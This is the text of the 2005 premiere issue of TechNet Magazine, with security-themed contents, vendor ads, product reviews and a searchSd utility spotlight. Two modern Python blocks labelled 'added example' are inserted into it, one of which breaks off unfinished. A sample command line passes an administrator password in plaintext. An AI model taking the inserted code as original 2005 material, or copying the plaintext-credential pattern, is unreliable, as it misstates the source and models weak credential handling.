TechNet Magazine
The Microsoft Journal for IT Professionals
www.technetmagazine.com

PREMIERE ISSUE

SECURITY

FIGHT BACK AGAINST HACKERS
LOCK DOWN YOUR NETWORK
Detect And Prevent Session Hijacking

MIX IT UP: Mac, UNIX, And Active Directory

SECRETS REVEALED: Catch Hackers In The Act

FREE SECURITY TOOLS: Six Resources For IT Pros

BOOST YOUR NETWORK'S IQ With Smart Cards

How To Respond To A Network Breach

FOCUS ON... Office • Exchange • SQL Server • IIS 6.0 • Windows XP SP2

Microsoft TechNet


Who's guarding your Exchange Server?

... a single anti-virus engine + static anti-spam!

98% Bayesian spam detection, multiple virus engines, heuristic analysis & more!

GFI MailEssentials for Exchange/SMTP
Server based anti-spam, disclaimers, mail archiving & more
• Bayesian filtering: Detects spam based on statistical message analysis
• Automatic whitelist management: Keep whitelists up-to-date without extra admin
• User-based spam quarantine: Sort spam to users' 'junk mail' folders
• Blacklists scanning: Stop mail from blacklisted senders
• Email header analysis + keyword checking: Blocks spam based on message field info and keywords
Used by customers like NASA, US Navy, MG Rover, Prudential, First National Bank and Trust, Fujitsu and many others
[Screenshot: GFI MailEssentials configuration]

GFI MailSecurity for Exchange/SMTP
Email anti-virus, content checking, exploit detection & anti-Trojan
• Multiple virus engines: Higher detection rate and faster response
• Email content & attachment checking: Quarantine dangerous attachments and content
• Email exploit protection: Protect against present and future viruses based on exploits
• Trojan & Executable Scanner: Detect malicious executables without virus updates
• HTML threats analysis: Disable HTML scripts
Used by customers like Caterpillar, IBM, Schuff International, Toyota, PerotSystems and many others
[Screenshot: GFI MailSecurity configuration]

Download your evaluation version today from www.gfi.com/tn

NETWORK SECURITY | CONTENT SECURITY | MESSAGING

tel: +1 888 243 4329 | email: sales@gfi.com | url: www.gfi.com/tn




Hacking: Fight Back

Anatomy Of A Hack: How A Criminal Might Infiltrate Your Network
Jesper Johansson
From elevating privileges to running SQL injection attacks, the criminal hacker has quite a few tricks up his sleeve. You'd better know what they are if you're going to keep this malevolent character out of your network.
page 24

Theft On The Web: Prevent Session Hijacking
Kevin Lam, David LeBlanc, and Ben Smith
There's a variety of ways that bad guys can take control of your network sessions, and they can do a lot of damage once they do take over. They can steal credit card information, user names, passwords, and more. Find out how to thwart their attempts before it's too late.
page 36

Beat Hackers At Their Own Game With A Hackerbasher Site
Marnie Hutcheson
Wouldn't it be great if you could turn the tables on Web site hack attempts by diverting them to a dead end where you can log all the information the attacker left behind? Here's how you can construct your own web to snare would-be attackers.
page 44

The Day After: Your First Response To A Security Breach
Kelly J. Cooper
They don't call it a post mortem for nothing. After an attack, it's best to assess the situation quickly, before facts slip away and the trail goes cold. Learn what makes a good post-hack post mortem.
page 50

Cross-Platform Security

Mixing It Up: Windows, UNIX, And Active Directory
Peter Larsen and Jason Zions
Did you know that with Active Directory you can provide centralized security and directory functionality for mixed environments, including those with UNIX-based machines? Find out what you need to achieve the single sign-on functionality you've been hoping for in your heterogeneous environment.
page 56

Yes, You Can! Secure Your Mac On A Windows Network
Jay Shaw
Don't let your lack of experience with Apple computers paralyze your attempts to connect them to your Windows-based network. Using Services for Macintosh, even a novice can get Windows and Mac machines to play together nicely.
page 62

Security: Beyond The Basics

Get Smart! Boost Your Network's IQ With Smart Cards
Brian Komar
Implementing smart card security gives you a double dose of safety—logon credentials and a piece of physical identification. Learn about the hardware, software, and management policies you need for a successful smart card deployment.
page 66

Security Watch: Six Free Microsoft Security Resources
Kai Axford
Microsoft Baseline Security Analyzer, Port Reporter, plus information on Windows XP SP2, Software Update Services, Microsoft security events, and more.
page 97




© 2004 Microsoft Corporation and CMP Media LLC. All rights reserved. 


Complying with all applicable copyright laws is the responsibility of the user. Without limiting the rights under copyright, no part of TechNet Magazine may be reproduced, stored in or introduced into a retrieval system, or transmitted in any form or 
by any means (electronic, mechanical, photocopying, recording, or otherwise), or for any purpose, without the express written permission of Microsoft Corporation. 


Active Directory, ActiveX, BackOffice, BizTalk, FrontPage, Microsoft, MSDN, MSN, Outlook, PowerPoint, SharePoint, Visual Basic, Windows, Windows NT, and Windows Server are either registered trademarks or trademarks of Microsoft Corporation in the 
United States and/or other countries. Other trademarks or trade names mentioned herein are the property of their respective owners. 


TechNet Magazine is published by CMP Media LLC. CMP Media LLC is an independent company not affiliated with Microsoft Corporation. Microsoft Corporation is solely responsible for the editorial contents of TechNet Magazine. MICROSOFT 
CORPORATION MAKES NO REPRESENTATION OR WARRANTY, EXPRESS OR IMPLIED, WITH RESPECT TO ANY CODE OR OTHER INFORMATION HEREIN, AND DISCLAIMS ANY LIABILITY WHATSOEVER FOR ANY USE OF SUCH CODE OR OTHER INFORMATION. 


You know the productivity and profitability downsides of downtime, but the high costs and complexities of traditional high availability solutions have kept their advantages out of your reach. Not anymore. With Neverfail's cluster-class high availability and disaster recovery solutions, you can simply and affordably keep your users connected to working applications.

Neverfail is the only company to offer high availability solutions for the Microsoft® technology platform that address both reliability and resilience — without them, high availability can never truly be achieved. Neverfail is also the only company with unique solutions designed to keep users continuously connected to a working application, no matter whether the failure occurs in the operating system, a hardware component, a software application, or somewhere within the network. If Neverfail finds a potential problem, in most cases, it's automatically fixed before it causes a failure.

Now that you know there's a company with proven products that are very affordable, extremely simple to install and easy to maintain, can you really afford not to protect your company's productivity, profitability and reputation? Call or email Neverfail today and let us show you how to eliminate downtime in no time!

info@us.neverfailgroup.com
www.neverfailgroup.com


Cluster-class high availability without the complexity or cost. 


Neverfail is a trademark of Neverfail Group Plc. All other trademarks, including Microsoft, Windows and Exchange, are trademarks of their respective companies. © Neverfail Group Plc, 2004. All rights reserved. No part of 
this publication may be reproduced, transmitted, transcribed, or translated into any language or computer language, in any form or by any means without prior express, written consent of Neverfail Group Plc. 




Security: Beyond The Basics

Five Lessons From The Microsoft Security Center Of Excellence
Aaron Turner
Dissecting the paths leading up to Slammer, Blaster, Sasser, and Code Red has allowed the Security Center of Excellence to help customers avoid such chaos in the future.
page 74

Integration

Voice Mail In Your Inbox: Cisco Unity And Microsoft Exchange Make It Happen
Jeff Centimano
Unified messaging with Cisco Unity combines the benefits of e-mail with the convenience of phone messaging. Plus, it snaps right into Microsoft Exchange.
page 78

Sure your system's secure? Our experts help you find your vulnerabilities, starting on page 24.

The Front: / In The Back:

How IT Works: Domain Name System
Regis Donovan
page 83

Case Study: A 200,000+ Desktop ...
Steve Reay
...scriptors With searchSd
page 88

Serving The Web: Essential Security Administration For IIS 6.0
Brett Hill
page 91

Round Up: 15 Tips For A Smooth ... To Exchange Server 2003
Jenna Lyday
page 95

...ducts For IT Professionals

...Encrypting Data, And More

...anagement In Office 2003

Resources: IIS 6.0 Security
Phil Sherwood

... Headers
page 101

TechNet Subscription Update
...g A Successful Campus
page 103

Field Notes: IT And Life Experie...
Andrew Shuman
page 104


Illustration by Hans Bjordahl Winter 2005 3 


EDITOR

It is with great pride that we present to you the inaugural issue of TechNet Magazine, the Microsoft journal for IT pros. Our goal is simple: we want to be your best source for in-depth technical information about how you can best use Microsoft tools and technologies in your IT job.

We serve the technical IT professional. The term "IT pro" covers a wide range of job functions, from the CIO to the network administrator to the administrative assistant responsible for resetting the laser printer down the hall. TechNet Magazine focuses on the technical core of the IT worker. For those of you working on applications and line-of-business products, we will feature real-world solutions, SQL Server, Exchange, and other tools. Do you specialize in network infrastructure? Every issue of TechNet Magazine will discuss Windows networking and Active Directory, and will remove some of the mystery behind them. Perhaps you administer 5,000 desktops and need to get security updates out to them. Our deployment coverage is for you.

We have unique content from Microsoft and well-known external authors. Microsoft security response has had a mixed reputation in the past, but I can tell you that there's no other company with as many resources dedicated to software security. When I first discussed the magazine with our security response teams earlier this year, we got a flood of great info. The articles we present here, written by Microsoft and external professionals, represent our commitment to security.

Every article in TechNet Magazine will help you do your job better. The premiere issue, which you are now holding, focuses on security from an IT perspective. If you're an IT pro, you understand how important security has become in your job. The best way to keep your site safe is to know the dangers you face, how to prevent them, and how to respond to them. Our security focus in this issue is split into three categories: hacking, cross-platform security, and beyond the basics. If you pick any article in the magazine, you'll come away with new tools to do your job.

We don't shy away from cross-platform coverage. We understand that it is the rare enterprise configuration that includes a single-vendor solution in all areas. TechNet Magazine has been founded to assist, not evangelize. In this issue, we show you how to deploy Kerberos across Windows and UNIX, how to make Apple Macs talk to Active Directory, and how to deploy Cisco Unity with Microsoft Exchange.

We are dedicated to content. Like our sister publication, MSDN Magazine, we provide at least 80 pages of real content in this and future issues. It's the only way we can begin to cover all the topics that can help you at work.

The magazine is a benefit of the Microsoft TechNet program. TechNet is undergoing a revitalization this year. If you're a TechNet subscriber in the United States, you are eligible for a free subscription to TechNet Magazine. If not, you can still get all of our content online at www.technetmagazine.com. No paid wall, just great content.

We want to hear from you. Drop us a line at tnmag@microsoft.com. Tell us what you want to see in future issues of TechNet Magazine, how we've helped you, and what you liked. You're our best partner in this venture, and we're all ears.

Thanks to the following Microsoft technical experts for their help with this issue: Lauren Antonoff, Norm Barber, Mary Browning, Charlie Chung, Steve Dodson, Ramsey Dow, Eric Fitzgerald, Ken Henderson, Joshua Hoffman, Kamal Janardhan, Jesper Johansson, Dan Longley, Laura Machado de Wright, Vikas Malhotra, Simon Marks, David Mowers, Michael Murgolo, Paul Thomsen, Angela Pan, Ben Smith, Michael Stowe, and George Swiger.

TechNet Magazine
WINTER 2005 VOLUME 1 NUMBER 1

GRANT DUERS Director

EDITORIAL: tnmag@microsoft.com

JOSHUA TRUPIN Executive Editor
ETYA NOVIK Managing Editor
STEPHEN TOUB Technical Editor
NANCY MICHELL Developmental Editor
TONY ELIAS Developmental Editor
JOAN LEVINSON Editor
JOAN SCHNEIDER Associate Editor

ART & PRODUCTION

VALERIE MYERS Art and Production Director
CARLOS BOLL Art Director
JOHN CARICATO Web Producer
AMY FILBIN Art and Production Associate
ROBERT GONZALEZ Administrative Assistant


TechNet Magazine (ISSN # 1551-2770) is published by CMP Media LLC. 600 Harrison St., San Francisco, CA 94107 415-947-6000. Newsstand price is $5.95. Registered for GST as CMP Media LLC, GST No. R13288078, Customer No. 2116057, Agreement No. 40011901. Order via the Web at http://technetmagsubs.com/?k=mh. Manuscript submissions and all other correspondence should be sent to TechNet Magazine, 6th Floor, 1290 Avenue of the Americas, New York, NY 10104. Copyright © 2004 Microsoft Corporation and CMP Media LLC. All rights reserved; reproduction in part or in whole without permission is prohibited.

CMP United Business Media


PUBLISHER:402-933-3388/kgates@cmp.com 


Kerry K. Gates 


ADVERTISING SALES: 
785-838-7573/dtimmons@cmp.com 


David Timmons Director of Sales 

Michele Hurabiell Regional Manager, West 

Ed Day Regional Manager, Central/Southeast 
Jon Hampson Regional Manager, East 

Julie Thibault Account Manager 

Michael Penne Production Manager 

Karen Jacobs Reprint Services 
800-682-4972 ext 7030 


MARKETING: 415-947-6192/ktom@cmp.com 


Karen Tom Director of Marketing 


CIRCULATION 


Kathy Henry Senior Circulation Manager 
Customer Service: lawrencecs@cmp.com 
To Place an Order: http://technetmagsubs.com/?k=mh 


CMP MEDIA LLC - MANAGEMENT 




Gary Marshall President and CEO 

John Day Executive Vice President and CFO 

Steve Weitzner Executive Vice President and COO 
Jeff Patterson Executive Vice President, 

Corporate Sales and Marketing 

Mike Mikos Chief Information Officer 

Bill Amstutz Senior Vice President, Operations 
Leah Landro Senior Vice President, Human Resources 
Sandra Grayson Vice President and General Counsel 
Peter Westerman Vice President, Group Publisher 
Software Development Media 


Printed in the USA 


Eliminate Application-Level Vulnerabilities

Automated Application-Level Inspection Services
www.reasoning.com

Security Inspection Service from Reasoning Inc., a provider of automated software inspection services that focus on C, C++, and Java-language apps, searches for security vulnerabilities that are the root cause for the majority of CERT Advisories, including buffer overflows, tainted data, race conditions, and risky operations. This includes finding defects that have not yet been exploited, reported to the security community, or that have known signatures. Static analysis can access 100 percent of the code and examine it for the structural defects that hackers are exploiting.

Once the security inspection is complete, Reasoning provides the customer with a report of the analysis and the offending code complete with the pre-conditions. The development team can then focus on fixing the vulnerability as quickly as possible. The service does not require expensive and time-consuming test case creation, validation, maintenance, and processes. Reasoning can normally perform this service in two weeks or less. The process allows vulnerabilities to be removed early without additional staff, training, or resources.

Price: Based on the number of lines of code to be analyzed and the depth of analysis.


Test Your Web Apps
www.ecyware.com

GreenBlue Inspector by Ecyware is an integrated Web application analyzer. It provides you with a compact but potent test platform for finding and documenting Web application vulnerabilities. The interface uses an integrated Web browser control and works just like a browser—a browser on steroids that lets you get under the hood and behind the scenes to view and modify browser requests, cookies, headers, and forms data. You can then analyze and document what comes back from the app and the Web server.

I like this product and I want one of my own. Few application test efforts are equipped with such an easy to use, versatile test engine. And with so many tools packed into such a small container!

The tool collects the headers, cookies, and form data in a session record that you can modify, with data and test insertions, and then replay. You can analyze the Web site application and server responses to your testing using handy reports, or you can record your test session for deeper analysis coverage and documentation.

The main workspace gives you three views of the page you are testing. It lets you see the page as it is displayed in the browser, you can view the HTML source, or you can use the forms view. Forms view gives you an editable hierarchical view of the forms on the application page. You can edit the source and change the values of virtually every field on a page. At the same time, you can follow your session steps using the event console, record your session, view and modify request and response headers, and cookies. You can use the Quick Tests page to see the effect of SQL injections, modified source code, and buffer overflows on the application you are testing. GreenBlue Inspector is implemented in 100 percent .NET managed code.


Marnie Hutcheson
...published a variety of technical papers and books on various computing topics. You can reach her at marnie@ideva.com.




Personal Security Tools and Gadgets

Protect Data in Your Workstation
www.encryptasoft.com

The Encryption Suite by EncryptaSoft is a collection of three encryption tools—EncryptAccount, EncryptaNote, EncryptaFile—that are designed to protect sensitive data in your workstation.

EncryptAccount is a password manager that lets you store all of your user names and passwords for easy access using one master password. You can copy and paste the appropriate user name and password straight from EncryptAccount to the Web site login page. When it's minimized, EncryptAccount sits in your SysTray (next to the system clock) for quick access.

EncryptaNote allows you to encrypt and decrypt password-protected text messages, which is especially useful in e-mails and instant messages that are normally transmitted in cleartext.

EncryptaFile allows you to encrypt and decrypt files anywhere on your computer (including removable media and network-connected drives). The Encrypt or Decrypt options are available in the right-click menu in the Windows File Explorer or via a simple to use interface that is similar in appearance to Windows Explorer.

The Encryption Suite is built on the Microsoft .NET Framework.

Price: A 30-day free trial is available for download. The entire suite sells for $19.95 online.


Embed Hidden Messages in Media Files
www.directlogic.com

Secret Media, by Direct Logic Systems, allows you to embed password-protected hidden messages in otherwise normal audio and video media files such as JPG, MP3, and WMA. The hidden messages are undetectable when viewing or playing these files. It has an easy-to-use wizard-style user interface that lets you create and view your password-protected hidden messages. It works with Windows 95, Windows 98, Windows 2000, Windows Me, and also Windows XP.

Price: $19.99.


[Screenshot: Secret Media wizard, "Select a media file you want to create into a Secret Media file." with a Select a file button]

www.syngress.com

Security Sage's Guide to Hardening the Network Infrastructure (Syngress Publishing) is billed as the first book to focus exclusively on how hackers exploit the "nuts and bolts" of computer networks.

I like this book! It's not only a best practice how-to guide, it's also a handy reference that offers lots of examples and solutions on every topic it covers. In addition, it's useful for both novice and seasoned practitioners.

The sages (the book has multiple authors/contributors) really lay it out in simple and understandable terms. The early chapters focus on defining the network perimeter and assessing your current security status. Then they discuss secure network components: firewalls, routers, protocols, network management, switching, and other related topics. The later chapters focus on defense: threat detection and hardening the design of the network and its components with software, hardware, and physical security procedures.

Chapters covering specific components discuss the component in general, possible attacks, and how to defend against them. Then the authors go on to present examples of vendor products. The book does not present a comprehensive guide to products of any particular type, but there are candid discussions of specific vendor products in most topics. Topics include features and vulnerabilities, security weaknesses to be patched, and patches to be applied.

The book presents lots of examples on how to plan and implement security procedures throughout the network. Real-world examples abound.

Also, they discuss tools, both software and hardware, to help you secure, monitor, and defend your network. They typically start with shareware and move on to commercial products. There are lots of explanatory diagrams, product screen shots, and good examples of what things are and how they work, what they cost, and anything else that is pertinent. Each chapter includes additional resource links, checklists, and frequently asked questions sections. All that, and a good read too.

Price: $59.95

Personal Security Database
www.passwords-lines.com

[Screenshot: Passwords-Lines, Stored Data view, trial-period notice]

The Passwords-Lines database provides encrypted storage and easy-to-find solutions to two personal security issues. One is provided by Passwords, which allows you to save your passwords along with a rich set of information related to the password (for example, what it goes to—the bank, my e-mail account, and so on). The other is provided by Lines, which allows you to save and retrieve data relating to things like college loans, credit cards, insurance, investments, leases, mortgages, and so forth. Both Passwords and Lines interact with each other in this encrypted relational database.

Price: A 30-day free trial is available for download. A license for two computers is available for $19.90.


Get a FREE white paper, "Integrating Your Existing Microsoft® IT Infrastructure with Non-Windows Systems." Simply go to www.integrateit.com


www.vintela.com 


YOU BETTER BELIEVE IT—Integrate and Consolidate 


Some people never want to look reality in the face. 
Others gladly accept it and keep moving forward. 
Those are the kind of people who celebrate Vintela 
integration solutions that enable Unix, Linux, Mac and 
Java to work together seamlessly within your existing 
Microsoft IT infrastructure. 


Vintela is the first and only software provider that 
makes interoperability and integration of hetero- 
geneous network environments simple by extending 
your Microsoft management tools (such as SMS, 
Active Directory, Group Policy) natively to your Unix, 
Linux, Mac, and Java systems. 


So how do we do it? Through something called the 
Vintela Integration Architecture—or VIA. 


VIA is a comprehensive architectural approach that 
builds on standards to normalize your complex multi- 
platform enterprise. VIA allows you to leverage your 
existing investment in Microsoft products and 
technologies by extending them to manage non- 
Windows systems. Vintela products eliminate the need 
for duplicate tools, redundant infrastructure, and 
repetitive tasks for each platform. 


COULD IT BE? MICROSOFT® INFRASTRUCTURE NOW UNITING UNIX, LINUX, MAC & JAVA

Vintela solutions include:

• Vintela Authentication Services - Integrated identity management and user authentication for Unix and Linux environments using Microsoft Active Directory with Kerberos and LDAP

• Vintela Group Policy - Group Policy for Unix and Linux through Active Directory

• Vintela Single Sign-on for Java - Single sign-on for J2EE environments from Active Directory

• Vintela Management Extensions - SMS for Unix, Linux, and Mac

Vintela


© 2004 Vintela, Inc. All rights reserved. Vintela is a trademark of Vintela, Inc. All other brand and product names are registered trademarks or trademarks of their respective owners. 


System Access Control Utility 
www.e-motional.com 

Transparent Screen Lock PRO 3.5,a 
system access control utility from e- 
motional.com, enables IT pros to secure 
their workstations or servers with password 
protection while viewing programs that are 
running in the background. 

Transparent Screen Lock PRO 3.5 sup- 
ports optional USB proximity sensor hard- 
ware that can be used to automatically lock 
the system when the user steps away and 
reactivates it to display TSL-PRO’s pass- 
word-protected logon screen when a user 
approaches. The proximity sensor hard- 
ware option is less than two square inches 
and can be mounted on a monitor port. 

Transparent Screen Lock PRO is ideal 

for facilities that must ensure compliance 
to the 21 CFR Part 11 code of U.S. federal
regulations. It supports Windows NT, Win- 
dows 2000, Windows XP, and Windows 
Server™ 2003. 
Price: $24.95 for a single-user license of 
the base version and $49.95 for the PRO 
version. Site licenses and volume discounts 
are available. A free trial version is avail- 
able. The proximity sensor hardware op- 
tion is $129.00. 


Advanced Application Security Firewall
www.rimapp.com

RoadBLOCK (RimApp Technologies), based on Microsoft Internet Security and Acceleration (ISA) Server 2004, is an intelligent network security appliance providing advanced application-layer firewall, VPN, and Web cache capabilities in a dedicated hardware security solution. A full range of products are available to suit both small to medium businesses and also enterprise businesses.

ISA Server 2004, part of Windows Server System, is the advanced stateful inspection application that enables users to easily maximize existing IT investments by improving network security and performance.

The RoadBLOCK's Web interface provides centralized Web management for each and every ISA Server 2004 firewall feature. RimApp's RoadBLOCK Web-based administration tool makes complex firewall configuration tasks simple by using everyday language.

The RoadBLOCK Firewall includes enhanced security and ease of management tools, powered by GFI, a developer of messaging, content security, and network security software. These include e-mail anti-virus and content checking, Web content checking, intrusion detection, anti-Trojan and anti-spam disclaimers, mail archiving, real-time Web monitoring, Web download antivirus, and security scanning and patch management.

[Image: RoadBLOCK Security Firewall Appliance. "In the battle against hackers, which tank are you driving?"]

Price: Estimated SRP is $2,300.

Protect Workstations and Servers
Proactive Defense Against Hackers and Malicious Software
www.softsphere.com

Anti-Cracker Shield by SoftSphere Technologies protects your entire system, including software apps, network settings, browsers, e-mail components, and the operating system itself. When a problem is found, the program informs the user and suggests how to fix it. Both workstation and server versions are available.

The Anti-Cracker Shield workstation provides proactive protection against attacks on the OS, including DDoS and spam-machine attacks. The server version works with several popular servers and allows a system administrator to specify which particular processes need to be fully protected.

The application explores the computer and its contents to identify vulnerabilities and potential exploits. It can identify and block predatory or malicious processes. It can also protect against new and unknown exploits by simply blocking any process that is used by hackers in order to infiltrate the system. Anti-Cracker Shield can protect Windows NT services without actually switching them off. It does not hinder computer performance and does not crash the PC when an attack occurs.

Price: $79 US Workstation and $499 US Server Edition. A free demo version is available for evaluation.

Make Your Host Anonymous
www.port80software.com/products

The less an attacker knows about the target Web server, the more likely he will resort to behaviors that make him an easy target for an intrusion detection system (IDS) rule set. That is why an IDS, like a firewall or antivirus system, should be supplemented by host anonymization—the hiding or obfuscating of vendor, version, and other information that malicious hackers use to profile the software running on a host prior to mounting an attack.

This is where tools like ServerMask 2.2 from Port80 Software come in. By keeping a Microsoft IIS Web server from being "fingerprinted" by a hacker, ServerMask increases the efficiency of intrusion detection systems.

Popular among government and financial organizations, ServerMask 2.2 provides extensive masking of HTTP response data for IIS (hiding, altering, or randomizing the Server header, changing HTTP header order, masking any header, and masking ASP session cookies).

ServerMask 3.0 takes this idea even further, allowing IIS to defeat all attempts at HTTP-level fingerprinting and to thwart stack scanners like NMAP that use subtle variations in different vendors' TCP/IP implementations to fingerprint the operating system itself.

Price: $99.95 for a single server license. A 30-day free trial is available for download.


All prices were confirmed at press time and are subject to change. 
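A defender-side check for the response leaks the ServerMask item lists, as an added example that is not Port80 Software's code: it parses a raw HTTP response from your own server, reports an IIS Server banner, the standard ASP.NET X-Powered-By and X-AspNet-Version headers, and ASPSESSIONID cookies, and returns the header order so a before/after masking comparison is possible. Both sample responses are constructed.

```python
# Added example, not Port80 Software's code: check your own server's response for the
# fingerprint indicators the blurb says ServerMask hides (Server banner, header order,
# ASP session cookies); X-Powered-By / X-AspNet-Version are standard ASP.NET headers.
from typing import Dict, List, Tuple

# Constructed sample responses: an unmasked IIS 6.0 reply and a masked one.
UNMASKED = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "X-AspNet-Version: 1.1.4322\r\n"
    "Set-Cookie: ASPSESSIONIDQQGGGNOP=ABCDEFGHIJKLMNOPQRST; path=/\r\n"
    "Date: Sun, 16 Jan 2005 01:00:00 GMT\r\n"
    "Content-Type: text/html\r\n"
    "\r\n<html></html>"
)
MASKED = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Sun, 16 Jan 2005 01:00:00 GMT\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: SESSID=ABCDEFGHIJKLMNOPQRST; path=/\r\n"
    "Content-Type: text/html\r\n"
    "\r\n<html></html>"
)

def parse_headers(raw: str) -> List[Tuple[str, str]]:
    """(name, value) pairs in wire order, names lower-cased; the order is itself a fingerprint."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs

def header_order(raw: str) -> List[str]:
    """Header names in wire order; compare the list before and after masking."""
    return [name for name, _ in parse_headers(raw)]

def fingerprint_leaks(raw: str) -> Dict[str, str]:
    """Indicator -> evidence for each IIS giveaway still present; empty means none found."""
    leaks: Dict[str, str] = {}
    for name, value in parse_headers(raw):
        if name == "server" and "iis" in value.lower():
            leaks["server-banner"] = value
        elif name in ("x-powered-by", "x-aspnet-version"):
            leaks[name] = value
        elif name == "set-cookie" and value.upper().startswith("ASPSESSIONID"):
            leaks["asp-session-cookie"] = value.split("=", 1)[0]
    return leaks

if __name__ == "__main__":
    for label, raw in (("unmasked", UNMASKED), ("masked", MASKED)):
        print(label, header_order(raw), fingerprint_leaks(raw) or "no IIS indicators")
```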


UTILITY SPOTLIGHT

Analyze Security Descriptors with searchSd

Your IT department is interested in conducting security audits. The group wants to have statistics generated about the usage of access control entries (ACEs) in their domain deployment. They want to be able to run a job every Sunday at 1:00 A.M. that will log the results to an XML file. These logs can then be examined to check for any new access rights that have been added to Active Directory® or for any existing objects that have been hidden, and possible signs of suspicious activity that should be investigated further.

As part of their audits, the IT department finds a security group that they are interested in deleting due to inactivity. They’re convinced this group is not being used, but how do they know for sure?

The searchSd command-line tool was written by Gokay Hurmali, a Software Design Engineer in Test working in the Microsoft Directory and Identity Services group. The tool analyzes security descriptors of objects in Active Directory. The creation of searchSd was motivated by the absence of a built-in way for Windows® to search for authorization data within Active Directory. Active Directory stores security descriptors as binary attributes of objects and as a result does not allow for customized searching of a descriptor’s fields.

This tool has two modes. The first mode is accessed by running searchSd with the /test:searchDacl switch. This mode will search the discretionary access control list (DACL) of a security descriptor and will compile a customized report for the ACEs in the DACL. From this, it’s possible to construct a general overview of the authorization hierarchy of an Active Directory environment. The tool can also dump all of the explicit ACEs found during the search.

Running searchSd with the /test:dumpOwner switch gives you access to the second mode, which generates a report that describes the owner field of each security descriptor found. To see all the objects in the report, add the /par2:dumpObjects switch to the command line.

In both modes, by default the search scope is the entire subtree under the domain naming context. However, this can be configured with the /objectDN, /filter, and /Scope switches, allowing for more control over the target search space.

When the tool is run, it performs an LDAP search and retrieves the list of all objects in the default or user-specified search scope. It then reads the binary security descriptor information of each object and uses it to compile the output report. searchSd can run against a domain controller or Active Directory Application Mode (ADAM) service from any machine in the network, and it does not need to run locally on the domain controller or ADAM server itself, though it is able to do so.

In addition to outputting information to the console, the searchSd tool can generate an XML report file containing all of the requested information.

Figure 1 shows the tool being used to get an overall picture of object ownership in the domain. You can download the searchSd.exe utility from the TechNet Magazine Web site at www.technetmagazine.com.

Figure 1 Object Ownership in the Domain

C:\>searchSd.exe /test:dumpOwner /hostmachine:myDc /admin:Administrator /adminpwd:Iw02tS!y /domain:myDomain
tool_dumpOwner: total objects checked: 11916 failure to read SD : 0
BUILTIN\Administrators (S-1-5-32-544)
owns 13 objects
MYDOMAIN\Domain Admins (S-1-5-21-306529421-2353485120-531261498-512)
owns 11890 objects
NT AUTHORITY\SYSTEM (S-1-5-18)
owns 8 objects
MYDOMAIN\DS3X12$ (S-1-5-21-306529421-2353485120-531261498-7753)
owns 2 objects
unknown sid [S-1-5-21-4047798943-3841610301-3130714431-512]
owns 1 objects
unknown sid [S-1-5-21-306529421-2353485120-531261498-1105]
owns 1 objects
MYDOMAIN\ua (S-1-5-21-306529421-2353485120-531261498-16464)
owns 1 objects
Time elapsed for searchSd.LOG.00003.xml: 8 Seconds.
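One way to turn the /test:dumpOwner report into audit findings, as an added example that is not part of searchSd: it parses the Figure 1 output (reproduced as a constructed sample), infers the domain identifier from the owner holding most objects, and flags owner SIDs from another domain (RID 512 is the well-known Domain Admins RID) and SIDs that no longer resolve.

```python
# Added example, not part of searchSd: triage the /test:dumpOwner report so the Sunday
# audit job can flag owners that deserve a closer look. Input is the Figure 1 output,
# reproduced here as a constructed sample.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SAMPLE_REPORT = """\
tool_dumpOwner: total objects checked: 11916 failure to read SD : 0
BUILTIN\\Administrators (S-1-5-32-544)
owns 13 objects
MYDOMAIN\\Domain Admins (S-1-5-21-306529421-2353485120-531261498-512)
owns 11890 objects
NT AUTHORITY\\SYSTEM (S-1-5-18)
owns 8 objects
MYDOMAIN\\DS3X12$ (S-1-5-21-306529421-2353485120-531261498-7753)
owns 2 objects
unknown sid [S-1-5-21-4047798943-3841610301-3130714431-512]
owns 1 objects
unknown sid [S-1-5-21-306529421-2353485120-531261498-1105]
owns 1 objects
MYDOMAIN\\ua (S-1-5-21-306529421-2353485120-531261498-16464)
owns 1 objects
Time elapsed for searchSd.LOG.00003.xml: 8 Seconds.
"""

OWNER_RE = re.compile(
    r"^(?:(?P<name>.+?) \((?P<sid>S-1-[\d-]+)\)|unknown sid \[(?P<usid>S-1-[\d-]+)\])$")
COUNT_RE = re.compile(r"^owns (\d+) objects?$")
SUMMARY_RE = re.compile(r"total objects checked: (\d+) failure to read SD : (\d+)")

@dataclass
class Owner:
    sid: str
    name: Optional[str]        # None where searchSd printed "unknown sid"
    count: int

    @property
    def domain_part(self) -> Optional[str]:
        """S-1-5-21-<domain identifier> without the RID; None for BUILTIN / NT AUTHORITY SIDs."""
        parts = self.sid.split("-")
        if self.sid.startswith("S-1-5-21-") and len(parts) == 8:
            return "-".join(parts[:7])
        return None

    @property
    def rid(self) -> int:
        return int(self.sid.rsplit("-", 1)[1])

def parse_summary(text: str) -> Tuple[int, int]:
    """(objects checked, security descriptors that could not be read)."""
    m = SUMMARY_RE.search(text)
    return (int(m.group(1)), int(m.group(2))) if m else (0, 0)

def parse_owner_report(text: str) -> List[Owner]:
    """Pair each owner line with the 'owns N objects' line that follows it."""
    owners, pending = [], None
    for line in text.splitlines():
        m = OWNER_RE.match(line.strip())
        if m:
            pending = (m.group("sid") or m.group("usid"), m.group("name"))
            continue
        c = COUNT_RE.match(line.strip())
        if c and pending:
            owners.append(Owner(pending[0], pending[1], int(c.group(1))))
            pending = None
    return owners

def infer_domain_sid(owners: List[Owner]) -> str:
    """The domain identifier owning the most objects (Domain Admins, in Figure 1)."""
    tally = {}
    for o in owners:
        if o.domain_part:
            tally[o.domain_part] = tally.get(o.domain_part, 0) + o.count
    return max(tally, key=tally.get)

def suspicious_owners(owners: List[Owner], domain_sid: str) -> List[str]:
    """Owners from another domain, or SIDs that no longer resolve to a principal."""
    findings = []
    for o in owners:
        if o.domain_part and o.domain_part != domain_sid:
            note = " (RID 512 = Domain Admins of that domain)" if o.rid == 512 else ""
            findings.append(f"foreign-domain owner {o.sid}{note} owns {o.count} objects")
        elif o.name is None:
            findings.append(f"unresolvable owner {o.sid} owns {o.count} objects")
    return findings

if __name__ == "__main__":
    owners = parse_owner_report(SAMPLE_REPORT)
    checked, failed = parse_summary(SAMPLE_REPORT)
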